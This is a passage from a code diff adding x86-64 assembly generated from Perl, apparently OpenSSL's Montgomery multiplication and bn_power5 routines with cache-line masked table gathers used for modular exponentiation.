+	lea	1($j),$j		# j++
+	mov	%rdx,$lo0
+
+	mulq	$m1			# np[j]*m1
+	cmp	$num,$j
+	jne	.L1st
+
+	movq	%xmm0,$m0		# bp[1]
+
+	add	%rax,$hi1
+	mov	($ap),%rax		# ap[0]
+	adc	\$0,%rdx
+	add	$hi0,$hi1		# np[j]*m1+ap[j]*bp[0]
+	adc	\$0,%rdx
+	mov	$hi1,-16(%rsp,$j,8)	# tp[j-1]
+	mov	%rdx,$hi1
+	mov	$lo0,$hi0
+
+	xor	%rdx,%rdx
+	add	$hi0,$hi1
+	adc	\$0,%rdx
+	mov	$hi1,-8(%rsp,$num,8)
+	mov	%rdx,(%rsp,$num,8)	# store upmost overflow bit
+
+	lea	1($i),$i		# i++
+	jmp	.Louter
+.align	16
+.Louter:
+	xor	$j,$j			# j=0
+	mov	$n0,$m1
+	mov	(%rsp),$lo0
+
+	movq	`0*$STRIDE/4-96`($bp),%xmm0
+	movq	`1*$STRIDE/4-96`($bp),%xmm1
+	pand	%xmm4,%xmm0
+	movq	`2*$STRIDE/4-96`($bp),%xmm2
+	pand	%xmm5,%xmm1
+
+	mulq	$m0			# ap[0]*bp[i]
+	add	%rax,$lo0		# ap[0]*bp[i]+tp[0]
+	mov	($np),%rax
+	adc	\$0,%rdx
+
+	movq	`3*$STRIDE/4-96`($bp),%xmm3
+	pand	%xmm6,%xmm2
+	por	%xmm1,%xmm0
+	pand	%xmm7,%xmm3
+
+	imulq	$lo0,$m1		# tp[0]*n0
+	mov	%rdx,$hi0
+
+	por	%xmm2,%xmm0
+	lea	$STRIDE($bp),$bp
+	por	%xmm3,%xmm0
+
+	mulq	$m1			# np[0]*m1
+	add	%rax,$lo0		# discarded
+	mov	8($ap),%rax
+	adc	\$0,%rdx
+	mov	8(%rsp),$lo0		# tp[1]
+	mov	%rdx,$hi1
+
+	lea	1($j),$j		# j++
+	jmp	.Linner_enter
+
+.align	16
+.Linner:
+	add	%rax,$hi1
+	mov	($ap,$j,8),%rax
+	adc	\$0,%rdx
+	add	$lo0,$hi1		# np[j]*m1+ap[j]*bp[i]+tp[j]
+	mov	(%rsp,$j,8),$lo0
+	adc	\$0,%rdx
+	mov	$hi1,-16(%rsp,$j,8)	# tp[j-1]
+	mov	%rdx,$hi1
+
+.Linner_enter:
+	mulq	$m0			# ap[j]*bp[i]
+	add	%rax,$hi0
+	mov	($np,$j,8),%rax
+	adc	\$0,%rdx
+	add	$hi0,$lo0		# ap[j]*bp[i]+tp[j]
+	mov	%rdx,$hi0
+	adc	\$0,$hi0
+	lea	1($j),$j		# j++
+
+	mulq	$m1			# np[j]*m1
+	cmp	$num,$j
+	jne	.Linner
+
+	movq	%xmm0,$m0		# bp[i+1]
+
+	add	%rax,$hi1
+	mov	($ap),%rax		# ap[0]
+	adc	\$0,%rdx
+	add	$lo0,$hi1		# np[j]*m1+ap[j]*bp[i]+tp[j]
+	mov	(%rsp,$j,8),$lo0
+	adc	\$0,%rdx
+	mov	$hi1,-16(%rsp,$j,8)	# tp[j-1]
+	mov	%rdx,$hi1
+
+	xor	%rdx,%rdx
+	add	$hi0,$hi1
+	adc	\$0,%rdx
+	add	$lo0,$hi1		# pull upmost overflow bit
+	adc	\$0,%rdx
+	mov	$hi1,-8(%rsp,$num,8)
+	mov	%rdx,(%rsp,$num,8)	# store upmost overflow bit
+
+	lea	1($i),$i		# i++
+	cmp	$num,$i
+	jb	.Louter
+
+	xor	$i,$i			# i=0 and clear CF!
+	mov	(%rsp),%rax		# tp[0]
+	lea	(%rsp),$ap		# borrow ap for tp
+	mov	$num,$j			# j=num
+	jmp	.Lsub
+.align	16
+.Lsub:	sbb	($np,$i,8),%rax
+	mov	%rax,($rp,$i,8)		# rp[i]=tp[i]-np[i]
+	mov	8($ap,$i,8),%rax	# tp[i+1]
+	lea	1($i),$i		# i++
+	dec	$j			# doesnn't affect CF!
+	jnz	.Lsub
+
+	sbb	\$0,%rax		# handle upmost overflow bit
+	xor	$i,$i
+	and	%rax,$ap
+	not	%rax
+	mov	$rp,$np
+	and	%rax,$np
+	mov	$num,$j			# j=num
+	or	$np,$ap			# ap=borrow?tp:rp
+.align	16
+.Lcopy:					# copy or in-place refresh
+	mov	($ap,$i,8),%rax
+	mov	$i,(%rsp,$i,8)		# zap temporary vector
+	mov	%rax,($rp,$i,8)		# rp[i]=tp[i]
+	lea	1($i),$i
+	sub	\$1,$j
+	jnz	.Lcopy
+
+	mov	8(%rsp,$num,8),%rsi	# restore %rsp
+	mov	\$1,%rax
+___
+$code.=<<___ if ($win64);
+	movaps	-88(%rsi),%xmm6
+	movaps	-72(%rsi),%xmm7
+___
+$code.=<<___;
+	mov	-48(%rsi),%r15
+	mov	-40(%rsi),%r14
+	mov	-32(%rsi),%r13
+	mov	-24(%rsi),%r12
+	mov	-16(%rsi),%rbp
+	mov	-8(%rsi),%rbx
+	lea	(%rsi),%rsp
+.Lmul_epilogue:
+	ret
+.size	bn_mul_mont_gather5,.-bn_mul_mont_gather5
+___
+{{{
+my @A=("%r10","%r11");
+my @N=("%r13","%rdi");
+$code.=<<___;
+.type	bn_mul4x_mont_gather5,\@function,6
+.align	32
+bn_mul4x_mont_gather5:
+.Lmul4x_enter:
+___
+$code.=<<___ if ($addx);
+	and	\$0x80100,%r11d
+	cmp	\$0x80100,%r11d
+	je	.Lmulx4x_enter
+___
+$code.=<<___;
+	.byte	0x67
+	mov	%rsp,%rax
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+___
+$code.=<<___ if ($win64);
+	lea	-0x28(%rsp),%rsp
+	movaps	%xmm6,(%rsp)
+	movaps	%xmm7,0x10(%rsp)
+___
+$code.=<<___;
+	.byte	0x67
+	mov	${num}d,%r10d
+	shl	\$3,${num}d
+	shl	\$3+2,%r10d		# 4*$num
+	neg	$num			# -$num
+
+	##############################################################
+	# ensure that stack frame doesn't alias with $aptr+4*$num
+	# modulo 4096, which covers ret[num], am[num] and n[2*num]
+	# (see bn_exp.c). this is done to allow memory disambiguation
+	# logic do its magic. [excessive frame is allocated in order
+	# to allow bn_from_mont8x to clear it.]
+	#
+	lea	-64(%rsp,$num,2),%r11
+	sub	$ap,%r11
+	and	\$4095,%r11
+	cmp	%r11,%r10
+	jb	.Lmul4xsp_alt
+	sub	%r11,%rsp		# align with $ap
+	lea	-64(%rsp,$num,2),%rsp	# alloca(128+num*8)
+	jmp	.Lmul4xsp_done
+
+.align	32
+.Lmul4xsp_alt:
+	lea	4096-64(,$num,2),%r10
+	lea	-64(%rsp,$num,2),%rsp	# alloca(128+num*8)
+	sub	%r10,%r11
+	mov	\$0,%r10
+	cmovc	%r10,%r11
+	sub	%r11,%rsp
+.Lmul4xsp_done:
+	and	\$-64,%rsp
+	neg	$num
+
+	mov	%rax,40(%rsp)
+.Lmul4x_body:
+
+	call	mul4x_internal
+
+	mov	40(%rsp),%rsi		# restore %rsp
+	mov	\$1,%rax
+___
+$code.=<<___ if ($win64);
+	movaps	-88(%rsi),%xmm6
+	movaps	-72(%rsi),%xmm7
+___
+$code.=<<___;
+	mov	-48(%rsi),%r15
+	mov	-40(%rsi),%r14
+	mov	-32(%rsi),%r13
+	mov	-24(%rsi),%r12
+	mov	-16(%rsi),%rbp
+	mov	-8(%rsi),%rbx
+	lea	(%rsi),%rsp
+.Lmul4x_epilogue:
+	ret
+.size	bn_mul4x_mont_gather5,.-bn_mul4x_mont_gather5
+
+.type	mul4x_internal,\@abi-omnipotent
+.align	32
+mul4x_internal:
+	shl	\$5,$num
+	mov	`($win64?56:8)`(%rax),%r10d	# load 7th argument
+	lea	256(%rdx,$num),%r13
+	shr	\$5,$num		# restore $num
+___
+		$bp="%r12";
+		$STRIDE=2**5*8;		# 5 is "window size"
+		$N=$STRIDE/4;		# should match cache line size
+		$tp=$i;
+$code.=<<___;
+	mov	%r10,%r11
+	shr	\$`log($N/8)/log(2)`,%r10
+	and	\$`$N/8-1`,%r11
+	not	%r10
+	lea	.Lmagic_masks(%rip),%rax
+	and	\$`2**5/($N/8)-1`,%r10	# 5 is "window size"
+	lea	96(%rdx,%r11,8),$bp	# pointer within 1st cache line
+	movq	0(%rax,%r10,8),%xmm4	# set of masks denoting which
+	movq	8(%rax,%r10,8),%xmm5	# cache line contains element
+	add	\$7,%r11
+	movq	16(%rax,%r10,8),%xmm6	# denoted by 7th argument
+	movq	24(%rax,%r10,8),%xmm7
+	and	\$7,%r11
+
+	movq	`0*$STRIDE/4-96`($bp),%xmm0
+	lea	$STRIDE($bp),$tp	# borrow $tp
+	movq	`1*$STRIDE/4-96`($bp),%xmm1
+	pand	%xmm4,%xmm0
+	movq	`2*$STRIDE/4-96`($bp),%xmm2
+	pand	%xmm5,%xmm1
+	movq	`3*$STRIDE/4-96`($bp),%xmm3
+	pand	%xmm6,%xmm2
+	.byte	0x67
+	por	%xmm1,%xmm0
+	movq	`0*$STRIDE/4-96`($tp),%xmm1
+	.byte	0x67
+	pand	%xmm7,%xmm3
+	.byte	0x67
+	por	%xmm2,%xmm0
+	movq	`1*$STRIDE/4-96`($tp),%xmm2
+	.byte	0x67
+	pand	%xmm4,%xmm1
+	.byte	0x67
+	por	%xmm3,%xmm0
+	movq	`2*$STRIDE/4-96`($tp),%xmm3
+
+	movq	%xmm0,$m0		# m0=bp[0]
+	movq	`3*$STRIDE/4-96`($tp),%xmm0
+	mov	%r13,16+8(%rsp)		# save end of b[num]
+	mov	$rp, 56+8(%rsp)		# save $rp
+
+	mov	($n0),$n0		# pull n0[0] value
+	mov	($ap),%rax
+	lea	($ap,$num),$ap		# end of a[num]
+	neg	$num
+
+	mov	$n0,$m1
+	mulq	$m0			# ap[0]*bp[0]
+	mov	%rax,$A[0]
+	mov	($np),%rax
+
+	pand	%xmm5,%xmm2
+	pand	%xmm6,%xmm3
+	por	%xmm2,%xmm1
+
+	imulq	$A[0],$m1		# "tp[0]"*n0
+	##############################################################
+	# $tp is chosen so that writing to top-most element of the
+	# vector occurs just "above" references to powers table,
+	# "above" modulo cache-line size, which effectively precludes
+	# possibility of memory disambiguation logic failure when
+	# accessing the table.
+	# 
+	lea	64+8(%rsp,%r11,8),$tp
+	mov	%rdx,$A[1]
+
+	pand	%xmm7,%xmm0
+	por	%xmm3,%xmm1
+	lea	2*$STRIDE($bp),$bp
+	por	%xmm1,%xmm0
+
+	mulq	$m1			# np[0]*m1
+	add	%rax,$A[0]		# discarded
+	mov	8($ap,$num),%rax
+	adc	\$0,%rdx
+	mov	%rdx,$N[1]
+
+	mulq	$m0
+	add	%rax,$A[1]
+	mov	16*1($np),%rax		# interleaved with 0, therefore 16*n
+	adc	\$0,%rdx
+	mov	%rdx,$A[0]
+
+	mulq	$m1
+	add	%rax,$N[1]
+	mov	16($ap,$num),%rax
+	adc	\$0,%rdx
+	add	$A[1],$N[1]
+	lea	4*8($num),$j		# j=4
+	lea	16*4($np),$np
+	adc	\$0,%rdx
+	mov	$N[1],($tp)
+	mov	%rdx,$N[0]
+	jmp	.L1st4x
+
+.align	32
+.L1st4x:
+	mulq	$m0			# ap[j]*bp[0]
+	add	%rax,$A[0]
+	mov	-16*2($np),%rax
+	lea	32($tp),$tp
+	adc	\$0,%rdx
+	mov	%rdx,$A[1]
+
+	mulq	$m1			# np[j]*m1
+	add	%rax,$N[0]
+	mov	-8($ap,$j),%rax
+	adc	\$0,%rdx
+	add	$A[0],$N[0]		# np[j]*m1+ap[j]*bp[0]
+	adc	\$0,%rdx
+	mov	$N[0],-24($tp)		# tp[j-1]
+	mov	%rdx,$N[1]
+
+	mulq	$m0			# ap[j]*bp[0]
+	add	%rax,$A[1]
+	mov	-16*1($np),%rax
+	adc	\$0,%rdx
+	mov	%rdx,$A[0]
+
+	mulq	$m1			# np[j]*m1
+	add	%rax,$N[1]
+	mov	($ap,$j),%rax
+	adc	\$0,%rdx
+	add	$A[1],$N[1]		# np[j]*m1+ap[j]*bp[0]
+	adc	\$0,%rdx
+	mov	$N[1],-16($tp)		# tp[j-1]
+	mov	%rdx,$N[0]
+
+	mulq	$m0			# ap[j]*bp[0]
+	add	%rax,$A[0]
+	mov	16*0($np),%rax
+	adc	\$0,%rdx
+	mov	%rdx,$A[1]
+
+	mulq	$m1			# np[j]*m1
+	add	%rax,$N[0]
+	mov	8($ap,$j),%rax
+	adc	\$0,%rdx
+	add	$A[0],$N[0]		# np[j]*m1+ap[j]*bp[0]
+	adc	\$0,%rdx
+	mov	$N[0],-8($tp)		# tp[j-1]
+	mov	%rdx,$N[1]
+
+	mulq	$m0			# ap[j]*bp[0]
+	add	%rax,$A[1]
+	mov	16*1($np),%rax
+	adc	\$0,%rdx
+	mov	%rdx,$A[0]
+
+	mulq	$m1			# np[j]*m1
+	add	%rax,$N[1]
+	mov	16($ap,$j),%rax
+	adc	\$0,%rdx
+	add	$A[1],$N[1]		# np[j]*m1+ap[j]*bp[0]
+	lea	16*4($np),$np
+	adc	\$0,%rdx
+	mov	$N[1],($tp)		# tp[j-1]
+	mov	%rdx,$N[0]
+
+	add	\$32,$j			# j+=4
+	jnz	.L1st4x
+
+	mulq	$m0			# ap[j]*bp[0]
+	add	%rax,$A[0]
+	mov	-16*2($np),%rax
+	lea	32($tp),$tp
+	adc	\$0,%rdx
+	mov	%rdx,$A[1]
+
+	mulq	$m1			# np[j]*m1
+	add	%rax,$N[0]
+	mov	-8($ap),%rax
+	adc	\$0,%rdx
+	add	$A[0],$N[0]		# np[j]*m1+ap[j]*bp[0]
+	adc	\$0,%rdx
+	mov	$N[0],-24($tp)		# tp[j-1]
+	mov	%rdx,$N[1]
+
+	mulq	$m0			# ap[j]*bp[0]
+	add	%rax,$A[1]
+	mov	-16*1($np),%rax
+	adc	\$0,%rdx
+	mov	%rdx,$A[0]
+
+	mulq	$m1			# np[j]*m1
+	add	%rax,$N[1]
+	mov	($ap,$num),%rax		# ap[0]
+	adc	\$0,%rdx
+	add	$A[1],$N[1]		# np[j]*m1+ap[j]*bp[0]
+	adc	\$0,%rdx
+	mov	$N[1],-16($tp)		# tp[j-1]
+	mov	%rdx,$N[0]
+
+	movq	%xmm0,$m0		# bp[1]
+	lea	($np,$num,2),$np	# rewind $np
+
+	xor	$N[1],$N[1]
+	add	$A[0],$N[0]
+	adc	\$0,$N[1]
+	mov	$N[0],-8($tp)
+
+	jmp	.Louter4x
+
+.align	32
+.Louter4x:
+	mov	($tp,$num),$A[0]
+	mov	$n0,$m1
+	mulq	$m0			# ap[0]*bp[i]
+	add	%rax,$A[0]		# ap[0]*bp[i]+tp[0]
+	mov	($np),%rax
+	adc	\$0,%rdx
+
+	movq	`0*$STRIDE/4-96`($bp),%xmm0
+	movq	`1*$STRIDE/4-96`($bp),%xmm1
+	pand	%xmm4,%xmm0
+	movq	`2*$STRIDE/4-96`($bp),%xmm2
+	pand	%xmm5,%xmm1
+	movq	`3*$STRIDE/4-96`($bp),%xmm3
+
+	imulq	$A[0],$m1		# tp[0]*n0
+	.byte	0x67
+	mov	%rdx,$A[1]
+	mov	$N[1],($tp)		# store upmost overflow bit
+
+	pand	%xmm6,%xmm2
+	por	%xmm1,%xmm0
+	pand	%xmm7,%xmm3
+	por	%xmm2,%xmm0
+	lea	($tp,$num),$tp		# rewind $tp
+	lea	$STRIDE($bp),$bp
+	por	%xmm3,%xmm0
+
+	mulq	$m1			# np[0]*m1
+	add	%rax,$A[0]		# "$N[0]", discarded
+	mov	8($ap,$num),%rax
+	adc	\$0,%rdx
+	mov	%rdx,$N[1]
+
+	mulq	$m0			# ap[j]*bp[i]
+	add	%rax,$A[1]
+	mov	16*1($np),%rax		# interleaved with 0, therefore 16*n
+	adc	\$0,%rdx
+	add	8($tp),$A[1]		# +tp[1]
+	adc	\$0,%rdx
+	mov	%rdx,$A[0]
+
+	mulq	$m1			# np[j]*m1
+	add	%rax,$N[1]
+	mov	16($ap,$num),%rax
+	adc	\$0,%rdx
+	add	$A[1],$N[1]		# np[j]*m1+ap[j]*bp[i]+tp[j]
+	lea	4*8($num),$j		# j=4
+	lea	16*4($np),$np
+	adc	\$0,%rdx
+	mov	%rdx,$N[0]
+	jmp	.Linner4x
+
+.align	32
+.Linner4x:
+	mulq	$m0			# ap[j]*bp[i]
+	add	%rax,$A[0]
+	mov	-16*2($np),%rax
+	adc	\$0,%rdx
+	add	16($tp),$A[0]		# ap[j]*bp[i]+tp[j]
+	lea	32($tp),$tp
+	adc	\$0,%rdx
+	mov	%rdx,$A[1]
+
+	mulq	$m1			# np[j]*m1
+	add	%rax,$N[0]
+	mov	-8($ap,$j),%rax
+	adc	\$0,%rdx
+	add	$A[0],$N[0]
+	adc	\$0,%rdx
+	mov	$N[1],-32($tp)		# tp[j-1]
+	mov	%rdx,$N[1]
+
+	mulq	$m0			# ap[j]*bp[i]
+	add	%rax,$A[1]
+	mov	-16*1($np),%rax
+	adc	\$0,%rdx
+	add	-8($tp),$A[1]
+	adc	\$0,%rdx
+	mov	%rdx,$A[0]
+
+	mulq	$m1			# np[j]*m1
+	add	%rax,$N[1]
+	mov	($ap,$j),%rax
+	adc	\$0,%rdx
+	add	$A[1],$N[1]
+	adc	\$0,%rdx
+	mov	$N[0],-24($tp)		# tp[j-1]
+	mov	%rdx,$N[0]
+
+	mulq	$m0			# ap[j]*bp[i]
+	add	%rax,$A[0]
+	mov	16*0($np),%rax
+	adc	\$0,%rdx
+	add	($tp),$A[0]		# ap[j]*bp[i]+tp[j]
+	adc	\$0,%rdx
+	mov	%rdx,$A[1]
+
+	mulq	$m1			# np[j]*m1
+	add	%rax,$N[0]
+	mov	8($ap,$j),%rax
+	adc	\$0,%rdx
+	add	$A[0],$N[0]
+	adc	\$0,%rdx
+	mov	$N[1],-16($tp)		# tp[j-1]
+	mov	%rdx,$N[1]
+
+	mulq	$m0			# ap[j]*bp[i]
+	add	%rax,$A[1]
+	mov	16*1($np),%rax
+	adc	\$0,%rdx
+	add	8($tp),$A[1]
+	adc	\$0,%rdx
+	mov	%rdx,$A[0]
+
+	mulq	$m1			# np[j]*m1
+	add	%rax,$N[1]
+	mov	16($ap,$j),%rax
+	adc	\$0,%rdx
+	add	$A[1],$N[1]
+	lea	16*4($np),$np
+	adc	\$0,%rdx
+	mov	$N[0],-8($tp)		# tp[j-1]
+	mov	%rdx,$N[0]
+
+	add	\$32,$j			# j+=4
+	jnz	.Linner4x
+
+	mulq	$m0			# ap[j]*bp[i]
+	add	%rax,$A[0]
+	mov	-16*2($np),%rax
+	adc	\$0,%rdx
+	add	16($tp),$A[0]		# ap[j]*bp[i]+tp[j]
+	lea	32($tp),$tp
+	adc	\$0,%rdx
+	mov	%rdx,$A[1]
+
+	mulq	$m1			# np[j]*m1
+	add	%rax,$N[0]
+	mov	-8($ap),%rax
+	adc	\$0,%rdx
+	add	$A[0],$N[0]
+	adc	\$0,%rdx
+	mov	$N[1],-32($tp)		# tp[j-1]
+	mov	%rdx,$N[1]
+
+	mulq	$m0			# ap[j]*bp[i]
+	add	%rax,$A[1]
+	mov	$m1,%rax
+	mov	-16*1($np),$m1
+	adc	\$0,%rdx
+	add	-8($tp),$A[1]
+	adc	\$0,%rdx
+	mov	%rdx,$A[0]
+
+	mulq	$m1			# np[j]*m1
+	add	%rax,$N[1]
+	mov	($ap,$num),%rax		# ap[0]
+	adc	\$0,%rdx
+	add	$A[1],$N[1]
+	adc	\$0,%rdx
+	mov	$N[0],-24($tp)		# tp[j-1]
+	mov	%rdx,$N[0]
+
+	movq	%xmm0,$m0		# bp[i+1]
+	mov	$N[1],-16($tp)		# tp[j-1]
+	lea	($np,$num,2),$np	# rewind $np
+
+	xor	$N[1],$N[1]
+	add	$A[0],$N[0]
+	adc	\$0,$N[1]
+	add	($tp),$N[0]		# pull upmost overflow bit
+	adc	\$0,$N[1]		# upmost overflow bit
+	mov	$N[0],-8($tp)
+
+	cmp	16+8(%rsp),$bp
+	jb	.Louter4x
+___
+if (1) {
+$code.=<<___;
+	sub	$N[0],$m1		# compare top-most words
+	adc	$j,$j			# $j is zero
+	or	$j,$N[1]
+	xor	\$1,$N[1]
+	lea	($tp,$num),%rbx		# tptr in .sqr4x_sub
+	lea	($np,$N[1],8),%rbp	# nptr in .sqr4x_sub
+	mov	%r9,%rcx
+	sar	\$3+2,%rcx		# cf=0
+	mov	56+8(%rsp),%rdi		# rptr in .sqr4x_sub
+	jmp	.Lsqr4x_sub
+___
+} else {
+my @ri=("%rax",$bp,$m0,$m1);
+my $rp="%rdx";
+$code.=<<___
+	xor	\$1,$N[1]
+	lea	($tp,$num),$tp		# rewind $tp
+	sar	\$5,$num		# cf=0
+	lea	($np,$N[1],8),$np
+	mov	56+8(%rsp),$rp		# restore $rp
+	jmp	.Lsub4x
+
+.align	32
+.Lsub4x:
+	.byte	0x66
+	mov	8*0($tp),@ri[0]
+	mov	8*1($tp),@ri[1]
+	.byte	0x66
+	sbb	16*0($np),@ri[0]
+	mov	8*2($tp),@ri[2]
+	sbb	16*1($np),@ri[1]
+	mov	3*8($tp),@ri[3]
+	lea	4*8($tp),$tp
+	sbb	16*2($np),@ri[2]
+	mov	@ri[0],8*0($rp)
+	sbb	16*3($np),@ri[3]
+	lea	16*4($np),$np
+	mov	@ri[1],8*1($rp)
+	mov	@ri[2],8*2($rp)
+	mov	@ri[3],8*3($rp)
+	lea	8*4($rp),$rp
+
+	inc	$num
+	jnz	.Lsub4x
+
+	ret
+___
+}
+$code.=<<___;
+.size	mul4x_internal,.-mul4x_internal
+___
+}}}
+{{{
+######################################################################
+# void bn_power5(
+my $rptr="%rdi";	# BN_ULONG *rptr,
+my $aptr="%rsi";	# const BN_ULONG *aptr,
+my $bptr="%rdx";	# const void *table,
+my $nptr="%rcx";	# const BN_ULONG *nptr,
+my $n0  ="%r8";		# const BN_ULONG *n0);
+my $num ="%r9";		# int num, has to be divisible by 8
+			# int pwr 
+
+my ($i,$j,$tptr)=("%rbp","%rcx",$rptr);
+my @A0=("%r10","%r11");
+my @A1=("%r12","%r13");
+my ($a0,$a1,$ai)=("%r14","%r15","%rbx");
+
+$code.=<<___;
+.globl	bn_power5
+.type	bn_power5,\@function,6
+.align	32
+bn_power5:
+___
+$code.=<<___ if ($addx);
+	mov	OPENSSL_ia32cap_P+8(%rip),%r11d
+	and	\$0x80100,%r11d
+	cmp	\$0x80100,%r11d
+	je	.Lpowerx5_enter
+___
+$code.=<<___;
+	mov	%rsp,%rax
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+___
+$code.=<<___ if ($win64);
+	lea	-0x28(%rsp),%rsp
+	movaps	%xmm6,(%rsp)
+	movaps	%xmm7,0x10(%rsp)
+___
+$code.=<<___;
+	mov	${num}d,%r10d
+	shl	\$3,${num}d		# convert $num to bytes
+	shl	\$3+2,%r10d		# 4*$num
+	neg	$num
+	mov	($n0),$n0		# *n0
+
+	##############################################################
+	# ensure that stack frame doesn't alias with $aptr+4*$num
+	# modulo 4096, which covers ret[num], am[num] and n[2*num]
+	# (see bn_exp.c). this is done to allow memory disambiguation
+	# logic do its magic.
+	#
+	lea	-64(%rsp,$num,2),%r11
+	sub	$aptr,%r11
+	and	\$4095,%r11
+	cmp	%r11,%r10
+	jb	.Lpwr_sp_alt
+	sub	%r11,%rsp		# align with $aptr
+	lea	-64(%rsp,$num,2),%rsp	# alloca(frame+2*$num)
+	jmp	.Lpwr_sp_done
+
+.align	32
+.Lpwr_sp_alt:
+	lea	4096-64(,$num,2),%r10	# 4096-frame-2*$num
+	lea	-64(%rsp,$num,2),%rsp	# alloca(frame+2*$num)
+	sub	%r10,%r11
+	mov	\$0,%r10
+	cmovc	%r10,%r11
+	sub	%r11,%rsp
+.Lpwr_sp_done:
+	and	\$-64,%rsp
+	mov	$num,%r10	
+	neg	$num
+
+	##############################################################
+	# Stack layout
+	#
+	# +0	saved $num, used in reduction section
+	# +8	&t[2*$num], used in reduction section
+	# +32	saved *n0
+	# +40	saved %rsp
+	# +48	t[2*$num]
+	#
+	mov	$n0,  32(%rsp)
+	mov	%rax, 40(%rsp)		# save original %rsp
+.Lpower5_body:
+	movq	$rptr,%xmm1		# save $rptr
+	movq	$nptr,%xmm2		# save $nptr
+	movq	%r10, %xmm3		# -$num
+	movq	$bptr,%xmm4
+
+	call	__bn_sqr8x_internal
+	call	__bn_sqr8x_internal
+	call	__bn_sqr8x_internal
+	call	__bn_sqr8x_internal
+	call	__bn_sqr8x_internal
+
+	movq	%xmm2,$nptr
+	movq	%xmm4,$bptr
+	mov	$aptr,$rptr
+	mov	40(%rsp),%rax
+	lea	32(%rsp),$n0
+
+	call	mul4x_internal
+
+	mov	40(%rsp),%rsi		# restore %rsp
+	mov	\$1,%rax
+	mov	-48(%rsi),%r15
+	mov	-40(%rsi),%r14
+	mov	-32(%rsi),%r13
+	mov	-24(%rsi),%r12
+	mov	-16(%rsi),%rbp
+	mov	-8(%rsi),%rbx
+	lea	(%rsi),%rsp
+.Lpower5_epilogue:
+	ret
+.size	bn_power5,.-bn_power5
+
+.globl	bn_sqr8x_internal
+.hidden	bn_sqr8x_internal
+.type	bn_sqr8x_internal,\@abi-omnipotent
+.align	32
+bn_sqr8x_internal:
+__bn_sqr8x_internal:
+	##############################################################
+	# Squaring part:
+	#
+	# a) multiply-n-add everything but a[i]*a[i];
+	# b) shift result of a) by 1 to the left and accumulate
+	#    a[i]*a[i] products;
+	#
+	##############################################################
+	#                                                     a[1]a[0]
+	#                                                 a[2]a[0]
+	#                                             a[3]a[0]
+	#                                             a[2]a[1]
+	#                                         a[4]a[0]
+	#                                         a[3]a[1]
+	#                                     a[5]a[0]
+	#                                     a[4]a[1]
+	#                                     a[3]a[2]
+	#                                 a[6]a[0]
+	#                                 a[5]a[1]
+	#                                 a[4]a[2]
+	#                             a[7]a[0]
+	#                             a[6]a[1]
+	#                             a[5]a[2]
+	#                             a[4]a[3]
+	#                         a[7]a[1]
+	#                         a[6]a[2]
+	#                         a[5]a[3]
+	#                     a[7]a[2]
+	#                     a[6]a[3]
+	#                     a[5]a[4]
+	#                 a[7]a[3]
+	#                 a[6]a[4]
+	#             a[7]a[4]
+	#             a[6]a[5]
+	#         a[7]a[5]
+	#     a[7]a[6]
+	#                                                     a[1]a[0]
+	#                                                 a[2]a[0]
+	#                                             a[3]a[0]
+	#                                         a[4]a[0]
+	#                                     a[5]a[0]
+	#                                 a[6]a[0]
+	#                             a[7]a[0]
+	#                                             a[2]a[1]
+	#                                         a[3]a[1]
+	#                                     a[4]a[1]
+	#                                 a[5]a[1]
+	#                             a[6]a[1]
+	#                         a[7]a[1]
+	#                                     a[3]a[2]
+	#                                 a[4]a[2]
+	#                             a[5]a[2]
+	#                         a[6]a[2]
+	#                     a[7]a[2]
+	#                             a[4]a[3]
+	#                         a[5]a[3]
+	#                     a[6]a[3]
+	#                 a[7]a[3]
+	#                     a[5]a[4]
+	#                 a[6]a[4]
+	#             a[7]a[4]
+	#             a[6]a[5]
+	#         a[7]a[5]
+	#     a[7]a[6]
+	#                                                         a[0]a[0]
+	#                                                 a[1]a[1]
+	#                                         a[2]a[2]
+	#                                 a[3]a[3]
+	#                         a[4]a[4]
+	#                 a[5]a[5]
+	#         a[6]a[6]
+	# a[7]a[7]
+
+	lea	32(%r10),$i		# $i=-($num-32)
+	lea	($aptr,$num),$aptr	# end of a[] buffer, ($aptr,$i)=&ap[2]
+
+	mov	$num,$j			# $j=$num
+
+					# comments apply to $num==8 case
+	mov	-32($aptr,$i),$a0	# a[0]
+	lea	48+8(%rsp,$num,2),$tptr	# end of tp[] buffer, &tp[2*$num]
+	mov	-24($aptr,$i),%rax	# a[1]
+	lea	-32($tptr,$i),$tptr	# end of tp[] window, &tp[2*$num-"$i"]
+	mov	-16($aptr,$i),$ai	# a[2]
+	mov	%rax,$a1
+
+	mul	$a0			# a[1]*a[0]
+	mov	%rax,$A0[0]		# a[1]*a[0]
+	 mov	$ai,%rax		# a[2]
+	mov	%rdx,$A0[1]
+	mov	$A0[0],-24($tptr,$i)	# t[1]
+
+	mul	$a0			# a[2]*a[0]
+	add	%rax,$A0[1]
+	 mov	$ai,%rax
+	adc	\$0,%rdx
+	mov	$A0[1],-16($tptr,$i)	# t[2]
+	mov	%rdx,$A0[0]
+
+
+	 mov	-8($aptr,$i),$ai	# a[3]
+	mul	$a1			# a[2]*a[1]
+	mov	%rax,$A1[0]		# a[2]*a[1]+t[3]
+	 mov	$ai,%rax
+	mov	%rdx,$A1[1]
+
+	 lea	($i),$j
+	mul	$a0			# a[3]*a[0]
+	add	%rax,$A0[0]		# a[3]*a[0]+a[2]*a[1]+t[3]
+	 mov	$ai,%rax
+	mov	%rdx,$A0[1]
+	adc	\$0,$A0[1]
+	add	$A1[0],$A0[0]
+	adc	\$0,$A0[1]
+	mov	$A0[0],-8($tptr,$j)	# t[3]
+	jmp	.Lsqr4x_1st
+
+.align	32
+.Lsqr4x_1st:
+	 mov	($aptr,$j),$ai		# a[4]
+	mul	$a1			# a[3]*a[1]
+	add	%rax,$A1[1]		# a[3]*a[1]+t[4]
+	 mov	$ai,%rax
+	mov	%rdx,$A1[0]
+	adc	\$0,$A1[0]
+
+	mul	$a0			# a[4]*a[0]
+	add	%rax,$A0[1]		# a[4]*a[0]+a[3]*a[1]+t[4]
+	 mov	$ai,%rax		# a[3]
+	 mov	8($aptr,$j),$ai		# a[5]
+	mov	%rdx,$A0[0]
+	adc	\$0,$A0[0]
+	add	$A1[1],$A0[1]
+	adc	\$0,$A0[0]
+
+
+	mul	$a1			# a[4]*a[3]
+	add	%rax,$A1[0]		# a[4]*a[3]+t[5]
+	 mov	$ai,%rax
+	 mov	$A0[1],($tptr,$j)	# t[4]
+	mov	%rdx,$A1[1]
